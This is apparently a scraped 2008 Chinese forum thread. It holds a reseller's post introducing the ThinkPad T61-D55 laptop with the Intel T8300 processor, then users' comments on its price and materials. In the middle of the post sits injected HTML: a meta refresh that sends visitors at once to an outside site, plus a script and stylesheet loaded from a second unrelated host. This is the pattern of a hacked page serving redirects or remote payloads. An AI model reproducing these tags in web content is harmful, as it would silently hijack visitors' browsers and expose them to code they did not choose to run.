开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

T8300处理器 T61-D55

Intel Core 2 Duo T8300新型移动处理器采用45nm工艺设计而成,Penryn核心、2.4GHz工作主频、3MB二级缓存、800MHz前端总线,工作性能得到提升。今天,北京[翔意禁止词语]在线老吴通知小编,配备这款新型处理器的ThinkPad T61-D55(香港版)笔记本,已经到货。下面,小编就为大家介绍一下这款产品。

ThinkPad T61-D55(香港版)

[ 本帖最后由 kilov 于 2008-3-9 13:44 编辑 ]<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

ThinkPad T61在机身各关键部件周围设置了金属防滚架,不仅可以增强中央部件的抗压能力,还能够减少主板的损伤,有效保护笔记本内部组件安全。T61在坚持传统式外观设计风格的同时,还增强了矩形线条的硬朗感,镁铝合金磨沙表面也更加顺滑了。

ThinkPad T61-D55的配置单

ThinkPad T61-D55的配置单
ThinkPad T61-D55(香港版)采用14.1英寸高分辨率宽屏幕设计,配备了Intel Core 2 Duo T8300处理器(2.4GHz主频/3MB二级缓存/800MHz前端总线)、Intel PM965芯片组、1GB DDR2内存、160GB硬盘、DVD刻录光驱和NVIDIA Quadro NVS 140M独立显卡。另外,它还支持迅盘技术、配备指纹识别器、802.11a/b/g无线网卡和蓝牙无线传输模块。

机器的正面和背面

机器的左侧和右侧
ThinkPad T61提供了以下机身接口:3个USB接口、IEEE 1394接口、VGA输出、RJ-11、RJ-45、PCMCIA卡插槽、音频输入/输出口、电源接口、无线网卡开关,扩展坞。

ThinkPad T61
    网络方面,ThinkPad T61内置有10/100/1000M千兆以太网卡和56K调制解调器,并配备了802.11a/b/g无线网卡和蓝牙无线传输模块。
好象报价贴已经有8300的本子了.......XY上货真快,,,,断货也真快
有了,这个在xy报价11100,带赠品的11200
这款应该不会马上断货吧
新货价格就是高啊……看来还是T7系列实惠一些……
希望XY快点给上评测的呀--------------
好机器!!!!!期待评测!!!!
hoho~~~~~~~~~~~有禁止词语!
好像又是深 蓝两个字
我知道禁止词语是什么
换了CPU作用会大很多吗?
新U的11K就能买到,比起以前算便宜不少了
原帖由 kilov 于 2008-3-10 13:14 发表
好像又是深 蓝两个字

这篇文章比较敏感。。。建议删除
好东西,不知道7系列被淘汰还要多久
11600,左右为难.......
镁铝合金磨沙表面也更加顺滑了。 狗屁 难道又是镁铝合金的材料了?
镁铝合金的材料不好么
现在的顶盖挺好的啊
现在开始盯着8吧,眼看就9出来了
哈哈 降了  200 ,!!!!
原帖由 kituq521 于 2008-3-11 08:11 发表
哈哈 降了  200 ,!!!!

一周内还会降。可惜我不买
你不是咋呼说周末拍300,然后就买了吗?